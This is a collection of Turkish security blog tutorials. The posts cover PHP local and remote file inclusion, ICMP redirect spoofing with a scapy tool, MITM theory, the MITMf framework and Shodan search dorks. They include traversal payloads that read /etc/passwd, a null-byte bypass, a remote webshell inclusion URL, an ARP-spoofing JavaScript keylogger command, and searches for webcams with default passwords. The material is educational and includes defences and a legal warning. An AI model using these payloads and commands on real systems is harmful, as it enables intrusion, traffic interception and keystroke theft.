Merhabalar, web uygulama güvenliğinde sayfaya dosya dahil etme(file inclusion) önemli bir zafiyet türüdür. Bu zafiyet türünün iyi anlaşılması için yazdığımı uygulamayı ve konunun detaylarını inceleyeceğiz. PHP dili ile yazdığımız bu uygulamaya https://github.com/sinansahin/cvwa-php-example adresinden ulaşabilirsiniz.

Dosya dahil etme zafiyetleri iki türlüdür. Bunlardan birisi uzak dosya dahil etme(remote file inclusion), diğeri yerel dosya dahil etme(local file inclusion). Uzak dosya dahil etme açığı, saldırganın sunucunuzda bulunmayan fakat sizin sisteminize zarar verecek veya veri hırsızlığına yol açabilecek kodların sizin sunucunuzda çalıştırması işlemidir. Yerel dosya dahil etme açığı ise kendi sistemimizde bulunan bir dosyanın istenmeyen bir şekilde saldırgan tarafından çalıştırılması işlemidir. Bu zafiyet ile saldırgan passwd ve config dosyaları gibi önemli dosyaları okuyabilir.

Zafiyet Nasıl Oluşuyor?

• Önlem Alınmamış

Genel olarak yukarıdaki gibi dahil edilecek dosya get ile alınıp hiç bir kontrol ve temizleme işlemine tabi tutulmadan include fonksiyonuna veriliyor. Saldırgan adres satırında ” index.php?file=/etc/passwd ” şeklinde bir istek yaptığında sistemin passwd dosyasını okuyabiliyor. Sistem içersinden bir dosya olan passwd’yi okumakla saldırgan local file inclusion zafiyetini kullanmış oldu. Saldırgan adres satırına ” index.php?file=http://example.com/webshell.txt ” şeklinde bir istek yaptığında eğer sistemin ayarlarında uzak dosya dahil etme aktif ise saldırgan sisteminiz üzerinde shell dosyası çalıştırmış olacaktır. Bu shell dosyasının özelliklerine ve salgırganın yeteneklerine göre artık saldırgan sisteminizde at koşturabilir Php versiyonunuz 4.0.3 ve üstü ise varsayılan olarak sisteminizin uzaktan dosya çalıştırma özelliği kapalıdır.

• Yetersiz Önlem Alınmışlar

Yazılımcı arkadaş kendince bir önlem almış. Saldırgan ” index.php?file=/etc/passwd ” şeklinde yapacağı isteği önlemiş. Fakat unuttuğu bir durum mevcut; dizinler arası geçiş. Saldırganın ” index.php?file=../../../../../etc/passwd ” şeklinde bir isteğine yazılımcı önlemi geçerli olmayacaktır.

Yazılımcı arkadaş saldırgan passwd dosyasını okuyamasın diye get isteği ile gelen veri içersindeki ” ../ ” değerlerini silmiş. Artık saldırgan ” index.php?file=/etc/passwd ” böyle bir istek yaptığında emellerine ulaşamıyor. Fakat yazılımcı arkadaşın atladığı bir durum mevcut: url encode. Saldırgan ” index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd ” şeklinde bir payload ile yoluna devam edebilir.

Yazılımcı arkadaş üstteki bu kod ile gelen veriye uzantı ekleyip içersinde url encoding yapılmış karakterleri temizlemiş. Burada PHP dilinin boş karakter görünce devamındaki kodu işlememesi durumunu veya çöp değer gönderme yöntemini kullanabiliriz. Saldırgan ” index.php?file=http://google.com%00 “, ” index.php?file=http://192.168.56.101/index.php?cop= ” ve buna benzer ürettiği bir çok payload ile emellerine ulaşabilir.

• Önlem alınmış

Bir çok önlem alınmamış kod inceledik. Peki bu zafiyeti oluşturmadan dosya dahil etme işlemini nasıl yapacağız sorunuza  yukarıdaki kodu geliştirdik. Dahil edeceğiniz dosyaları önceden belirlemeniz sizi bir anlamdan güvene alacaktır.  Gelen isteğin içinden sadece dosya adını ayrıştırıp, dizi içinde var mı kontrolü ile dahil edeceğiniz dosyayı doğru seçebilirsiniz.

Sorularınızı ve yorumlarınızı aşağıda paylaşırsanız memnun oluruz.

TR | PHP File Inclusion Vulnerability Sinan Şahin

Giriş:
Sahte ICMP Redirection paketleri ile bir kurbanın ağ trafiğini üzerinize alabilirsiniz ve bunu Arp tablosunda duplication oluşturmadan yapabileceğiniz için bazı arp spoofing tespit yazılımlarını atlatabilirsiniz.
Bu yazıda bu yönteme kabaca değinilmiş olup scapy kütüphanesi ile bunu yapan bir araç geliştirilmiştir.

ICMP Hakkında:

ICMP (Internet Control Message Protocol (Türkçe adıyla Internet Kontrol Mesaj İletişim Protokolü)),
geri bildirimler yapmak için kontrol amaçlı kullanılan bir protokoldür.
IP’ nin, hata düzeltme veya raporlama özelliği yoktur. Bu yüzden, bu amaçlar için ICMP kullanılır.
IP(Internet Protokolü) hakkında daha fazla bilgi için buraya başvurulabilir.

ICMP genelde, yok edilen paketlerde, hata oluşumlarında ve paketin gideceği yolun değişeceği zamanlarda bilgilendirme yapılması amacıyla kullanılır.

Komut satırı araçlarından sıkça kullanılan “Ping” ve “Traceroute”(Windows’ta “Tracert”) da ICMP Echo Request ve Reply mesajlarıyla çalışır.

Bir Host’a ping atıldığında neler olduğunu Wireshark vb programlar ile görebilirsiniz:
Bunun için komut satırında,
ping www.google.com
gibi örnek bir komut verdiğinizde wireshark ICMP paketlerini yakalamaya başlayacaktır.
Çerçeve 2 kez tıklayarak açıldığında Internet Control Message Protocol sekmesi altında;
Type:0(Echo Reply) veya Type:8 (Echo Request) Gözükür. Bu ICMP paketlerinin tipini belirler.

Echo request:

Echo reply:

ICMP paketlerinin farklı tip değerleri vardır. Tamamı için buraya bakılabilir. Bu yazıda sadece 3 tanesi üzerinde durulmuştur, bunlar:
Type:8 (Echo Request)
Type:0 (Echo Reply)
Type:5 (Redirection Required)

ICMP Redirection Required Hakkında:

Daha iyi bir ağ geçitinin(gateway) bildirilmesi amacıyla kullanılır. Paketi alan host veya router, routing tablosuna yeni ağ geçidini ekleyecektir(Önlem amaçlı gerekli konfigürasyon yapılmamış ise). 0(Ağ için), 1(Host için), 2(Servis ve ağ için), 3(Servis ve host için) olmak üzere 4 farklı kodu vardır.

Daha iyi anlamak için buradaki görsel faydalı olabilir.
Bir ICMP Redirection Required çerçeve yapısı aşağıdaki gibidir:

Bu yazıda bahsedilen özellikler görselde kırmızı olarak sayılar ile belirtilmiştir:
1) Wireshark son kullanıcı için “Redirect for host” olduğunu tespit etmiştir.
2) ıP’ nin başlığında protokol numarası 1 olduğu için ICMP yazmıştır.
3) ICMP’ nin Tipi 5 olduğu için yanına Redirect yazmıştır.
4) Redirect’ in Kodu 1 olduğu için Redirect for host yazmıştır.

ICMP Redirection Spoofing Yapan Araç Hakında:

ICMP Redirection saldırısı için kullanılabilinecek araçlardan bazıları aşağıda verilmiştir:

hping, ettercap, bettercap, zarp, scapy, icmp_redirect(BT ve Kali ile kurulu gelmektedir.), icmpush, Sing .

Bu yazıda python scapy kütüphanesi kullanılarak ICMP redirection saldırısı yapacak ufak bir betik kod geliştirilmiştir.

ICMP kullanıldığını anlamanın yolu IP paketinin başlık bilgisine bakmaktır. Eğer protokol alanı 1 ise ICMP
kullanıldığı anlaşılmaktadır. Scapy bu detaylar ile uğraşılmaması için bir çok özelliği beraberinde getirmektedir.

Öncelikle ortadaki adam saldırısı(MITM(Man in the middle)) gerçekleştirilen sistemde kernel ip forward’ in etkinleştirilmesi gerekmektedir, genellikle ” echo “1”> /proc/sys/net/ipv4/ip_forward ” kullanılsa da bu yazıda sysctl konfigürasyonu kullanılmıştır. Sysctl ile ilgili daha fazla manual sayfasından ulaşılabilir.
İlgili komut:

sudo sysctl net.ipv4.ip_forward=1

(Not: -w parametresi kimi zaman gereklidir.)
Ardından scapy terminal üzerinden çağrılabilir yada python etkileşimli kabuğu üzerinde iken kütüphane olarak eklenebilir.
Modüller, “import scapy” ile eklenir ise metodlar scapy.metod() şeklinde kullanılmak zorundadır. Bunun yerine metod() veya fonksiyon() kullanabilmek için modülün:

“from scapy.all import * ” şeklinde eklenmesi gerekmektedir.

Github’ a yazar tarafından eklenmiş kod üzerinde açıklayıcı yorumlar yeterli görülmüş olup yazıda okurun canı sıkılmamak istenmiştir.

Kurulum için verilmesi gereken komutlar sırasıyla:

wget https://raw.githubusercontent.com/cemonatk/My-Tools/master/cypm_icmpredirect.py

ve kullanım için:

python cypm_icmpredirect.py -a eth0 -k 'KURBAN IP ADRESI' -g 'AG GECITI IP ADRESI'

Aracı terminal üzerinden herhangi bir dizinde çalıştırmak için ~bin/ dizini altına kısayol eklenmesi gerekmektedir.
Bunun için cypm_icmpredirect.py kodunun olduğu dizinde iken sırasıyla;

mv cypm_icmpredirect.py cypm_icmpredirect

chmod +x cypm_icmpredirect

cd ~bin/

ln -s ~/KODUN INDIRILDIGI DIZIN/cypm_icmpredirect

komutları verilebilir. Bu aşamanın ardından herhangi bir dizinde iken cypm_icmpredirect komutu ve parametreleri ile program çalışabilir haldedir.

Saldırının Gerçekleştirilmesi:

Kurban tarafında ARP tablosu ilk hali:

Saldırı komutu verince terminal:

Kurban tarafında ARP tablosu  son hali,

Kurban canyoupwn.me adresine bağlanmak isterken; saldırgan makinedeki Wireshark üzerinde görülen DNS istekleri ekran alıntısında gözükmektedir:

Sonuç olarak:

• ICMP Redirection saldırılarına karşı alınabilecek önlemlerden bazıları:

1. https://docs.oracle.com/cd/E36784_01/html/E36838/icmp-1.html
2. https://support.microsoft.com/en-us/kb/293626
3. http://www.itsyourip.com/Security/how-to-disable-icmp-redirects-in-linux-for-security-redhatdebianubuntususe-tested/comment-page-1/

• Full Duplex ICMP Redirection Saldırıları hakkında detaylı bilgi edinmek için buraya başvurulabilir. Gerçekleştirmek için burada anlatıldığı gibi bettercap kullanılabilir.

• Türk Ceza Kanunu madde 243’ün 24/3/2016 tarihli 4. ek fıkrasınca burada bahsedildiği gibi ortadaki adam saldırısı gerçekleştiren veya trafiği yasa dışı dinleyen kişiler 1 yıldan 3 yıla hapis cezalandırılır. Burada yazılmış olan blog yazısı ve geliştirilen araç kendi laboratuvar ortamınızda kullanılmak için hazırlanmıştır.

• Aracın kullanımı kodlar veya yazı ile ilgili anlaşılmayan yerler için benimle:
  “cem {(At}] canyoupwn ({n0-kta] me” mail adresi üzerinden iletişime geçebilirsiniz.

TR | ICMP Redirection Spoofing ile MITM ve Bunu Yapan Aracın Geliştirilmesi Cem Onat Karagün

Nedir bu MITM (Man In The Middle)?
Bunu açıklamadan önce yüzeysel olarak ağda bilgisayarların haberleşme şekillerinden bahsetmekte fayda var.
Birden fazla bilgisayarın tek bir ağda birbirleriyle haberleşebilmeleri için bu bilgisayarları ağa dahil eden Hub ve
Switchler mevcuttur.

Hublar OSI modelinin ilk katmanı olan fiziksel katmanda çalışan ve gelen veride hiç bir kontrol işlemi uygulamadan kendi portlarına bağlı tüm sistemlere yollayan bir modeldir. Alıcı bilgisayar, veri kendisine gelmiş ise veriyi kabul eder,  eğer gelmemiş ise göz ardı eder. Böylelikle aslında ağ üzerinden geçen bütün paketlerin takibi
mümkün kılınmaktadır.

Switchler ise OSI modelinin 2. katmanında çalışır ve hub gibi dağıtım görevinden sorumludur. Hubtan farklı olarak, switch veriyi portlarına bağlı tüm sistemlere dağıtmak yerine sadece hedef sisteme dağıtır. Bu sebep ile veri hem daha dinamik ve verimli şekilde hedefe ulaşır hemde paketler ilgili olmayan kişi-
ler tarafından okunamaz. Mı acaba ?

İşte bu noktada MITM adını verdiğimiz, Türkçesi Ortadaki Adam Saldırısı olanve oldukça favorim olan bir yol izleyebiliriz.

Örnek senaryomuzdada gördüğünüz gibi iki kullanıcı birbirleriyle haberleşmek istemektedir ve bunu switch aracılığıyla rahatlıkla yapmaktadır. Switch kendisine bağlı olan tüm bilgisayar yada hostların MAC adreslerini bir ARP tablosu adını verdiğimiz bir tabloda tutar. Kaynak sistem, hedef sistemle iletişim kurmak için Arp tablosunu kontrol eder ve ilgili kullanıcıyı bulur. Korsan ArpSpoofing saldırısı ile çok sayıda request göndererek ARP önbelleğini zehirler ve Arp spoofing saldırısı sonucu zehirlenen Arp önbelleği farklı çalışmaya başlar ve kaynak bilgisayardan gelen veriyi korsanın bilgisayarına, korsanda iletilmesi gereken kaynağa gönderir. Böylelikle bütün paketler korsan bilgisayardan yakalanabilir hale gelir ve paketler incelenerek istenilen verilere
ulaşılabilir.

Bu yöntem ile switch kullanılan ağlarda sniffing yapılmış olur. Bu saldırılar nasıl yapılır, hangi araçlar ile yapılabilir gibi soruların cevabını bulmak için diğer makalelerimize göz atmanızı tavsiye ederim.

Buraya kadar MITM’in mantığını anladıysak gelelim buna ne gibi önlemler alınabilir ?

Spoofing gibi saldırılar aynı ağ üzerinde olan sistemlere yönelik olduğundan ve arp paketi gönderebilmek için yönetici yetkisine sahip olmak gerektiği için ağa yetkisiz kişilerin bağlanması ve boot edilmesi güvenliği geçersiz
kılacaktır. Bu sebepten dolayı öncelikle fiziksel önlemler alınmalıdır.

Eğer büyük bir ağ yapınız yok ise Arp önbelleğinizi static hale getirirseniz her hangi bir ARP Request ve ARP Reply paketleriyle güncellenmesinin önüne geçileceğinden dolayı güvenli bir hala gelmiş olur. Bir başka yöntem ise ağınızı
düzenli olarak kontrol etmenizdir.

TR | MITM Teorisi Mert Gücü

Merhabalar,

Bu yazımızda MITMf isimli MITM ataklarını gerçekleştirmeye yarayan frameworkü ele alıp inceleyeceğiz. Öncelikle MITM nedir diye bir giriş yapalım.

MITM, Man In the Middle ın kısaltılmış hali olup, hedef ile network trafiğinin arasına girip çeşitli işlemler yapmaya yarayan atak methodudur.

Şimdi asıl işimiz olan MITMf tooluna gelirsek, öncelikle toola buradan ulaşabilirsiniz.

Şimdi uygulamamızı kurmamız için aşağıdaki komutları sırasıyla verelim.

git clone https://github.com/byt3bl33d3r/MITMf.git mitmf
pip install -r requirements.txt

Artık atak için hazır durumdayız.

Kullanılabilir pluginleri görmek için, “python mitmf.py –help” komutunu kullamamız gerekiyor. Aktif kullanabileceğimiz pluginler:

Şimdi, konfigürasyonlarımızı ayarlamamız gerekiyor. Şu lokasyonda bulunuyor: ‘/usr/share/mitmf/config/mitmf.cfg.’

Yukarıdaki gibi FilePwn kısmına geldiğimizde CompressedFiles bölümünde HOST değerlerini görüyoruz. Bunları kendimize göre ayarlamamız gerekiyor.

Yukardaki gibi ekranı görüyor olacaksınız biraz daha aşağı indiğimizde.

Artık atak için tamamiyle hazırız.

Şimdi terminalden ‘ifconfig’ komutu ile IP ve Interface değerlerimizi öğreniyoruz. Ardından, ‘route -n’ komutu ile gateway değerimizi öğreniyoruz.

wlan0 şeklinde IP mizin 10.200.1.20 , gateway değerimizin, 10.200.1.1 olduğunu varsayalım. Şimdi yapmamız gereken şey, hedefin IPsini alıp gerekli işlemleri gerçekleştirmek. Bunun için:

nmap -sP -T4 10.200.1.0/24

Şeklinde bir NMAP taraması başlatıyoruz. Şimdi hedefimizin IP adresi, 10.200.1.35 olsun.

Biz şu şekilde bir JS Keylogger atak yapabiliriz.

sudo python mitmf.py --arp --spoof --i eth0 --gateway 10.200.1.20 --target 10.200.1.35 --jskeylogger

JS Keylogger benim en sevdiğim özellik olduğu için onu örnek gösterdim.

Diğer yazıda, bir başka teknik anlatmak üzere. İyi spooflamalar

TR | MITMf Nedir ve Nasıl Kullanılır ? CanYouPwnMe

Shodan Discovery?

Shodan internet üzerinde tüm dünyaya ait ilginç şeyler bulabileceğiniz bir arama motorudur. Bunlara örnek verirsek kameralar , bitcoin akışları , zombi haline getirilmiş bilgisayarlar , üzerindeki serviste zaafiyet bulunduran portlar , SCADA sistemler ve daha nicelerini bulabiliriz. Üstelik daha spesifik aramalar da yapmak mümkündür. Arama sonucunda Shodan bize Dünya üzerinde zaafiyetli hostları sayı vererek gösterir.

Burada örnek bir Shodan Bitcoin raporunu görüyoruz.

Sample Report

Peki Shodan üzerinde nasıl keşif yapacağız?

Arama butonunun yanındaki Explore sekmesine tıkladığınızda popüler aramalar altında bazı işe yarar arama sonuçlarını bulabilirsiniz. Yapılan arama sonuçlarında hedefimizin daha ayrıntılı bilgilerine ulaşmak için “details” sekmesine tıklayarak “City, Country, Organization, ISP, Last Update, Hostname” bilgilerine ve harita üzerindeki konumuna erişebiliriz.

Bu arama motoru Google’da bulunan “site: , intext: , inurl:” gibi spesifik arama komutlarına sahiptir.

Bunları ele alalım.

• Port Taraması

Port taraması örneği || https://shodan.io/search?query=port:22,80,445

Shodan Port Searching

Port parametresini kullanarak 22,80,445 portlarını tarattık.

• Server Taraması

Server taraması örneği || https://shodan.io/search?query=server:webcam

Shodan Server Searching

Server parametresi ve sihirli kelimemiz sayesinde Default şifrelere sahip yüzlerce kameraya ulaştık. Siz daha hoş şeyler de bulabilirsiniz.

• İşletim Sistemi Taraması

İşletim Sistemine göre tarama örneği || https://shodan.io/search?query=os:"linux"


Shodan OS Searching

OS parametresini kullanarak Linux sistemleri tarattık. Sol tarafta Linux versiyonlarını daha detaylı bulabilirsiniz.

• Ülkeye Göre Tarama
  

Ülkeye göre tarama örneği || https://shodan.io/search?query=country:TR


Shodan Country Searching

Country parametremizle Türkiye üzerinde tarama yaptık. Bazı büyük şirketlere ait sonuçlara ulaştık.

• Şehre Göre Tarama

Şehre göre tarama örneği || https://shodan.io/search?query=city:"new york"

Shodan City Searching

City parametremizi kullanarak New York üzerindeki zaafiyetli sistemlere ulaştık.

• Şirket(Organizasyon) Taraması

Şirkete göre tarama örneği || https://shodan.io/search?query=org:”Turk+Telekom”

Shodan Organization Searching

• Host Üzerinde Kullanılan Ürüne Göre Tarama

Ürüne göre tarama örneği || https://shodan.io/search?query=product:”MySQL”

Shodan Product Example

Product parametresini kullanarak MySQL kelimesini tarattık. Çıkan sonuçlarda MySQL versiyonlarına ulaştık.

Daha detaylı arama sonuçlarına ulaşabilmek için aramamızda iki ve daha fazla parametreyi birlikte kullanabiliriz. Örneğin;

https://shodan.io/search?query=country:US,TR os:”linux”

Shodan MultiParameter Searching

Birden fazla parametre kullanarak çemberimizi daralttık. Arama sonucunda Amerika ve Türkiye üzerindeki Linux makinelere ulaştık.

Bahsetmeden geçmeyelim Shodan üzerinden exploitte arayabilirsiniz. Burada bulduğunuz exploitler genel olarak Exploit-DB üzerinden gelir. İşinize yarayacak her türlü exploiti bulabilirsiniz.

Örneklerle Shodan üzerinde keşif yaptık. Gördüğünüz üzere özel parametrelerimizle daha spesifik sonuçlara ulaştık. Çıkan sonuçlarda hedefimize ait veri toplamaya yönelik birçok ayrıntıya da ulaşmış olduk. Shodan üzerinde ne arayıp ne bulmak istediğiniz sizin hayal gücünüze kalmış.

TR | Shodan Discovery CanYouPwnMe